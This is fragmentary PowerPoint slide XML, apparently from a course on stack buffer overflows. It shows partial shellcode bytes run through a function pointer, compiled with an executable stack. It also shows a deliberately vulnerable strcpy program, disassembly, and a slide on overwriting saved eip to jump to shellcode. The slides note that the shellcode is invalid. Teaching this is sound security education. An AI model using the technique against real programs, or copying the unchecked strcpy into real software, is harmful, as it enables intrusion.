            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>                   "\x53\x86\xe5\x89\xc2\x0b\x01\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"	                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>                   "\x80\x31\xc0\xb0\x01\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"	                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>                   "\x80";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> (*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  shell=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  shell();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -m32 -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>test_shellcode.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh-4.1$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Note: This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> is not valid, you will have to make your own!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69654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5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5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57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57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57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57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579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4579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4579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4579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4579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45795">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45795">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45795">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4579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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Jumping to the Shell Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order to jump to the shell code we need to overflow a target buffer with a string that contains:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The shell code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Random junk up until the saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The address of the shell code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73610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953" y="305134"/>
            <a:ext cx="4840977" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>foo [50];   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(foo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 10;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>206</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5068261" y="190041"/>
            <a:ext cx="5832763" cy="666795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2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  push </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endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</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endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x3c,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0xc(</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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$0x4,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
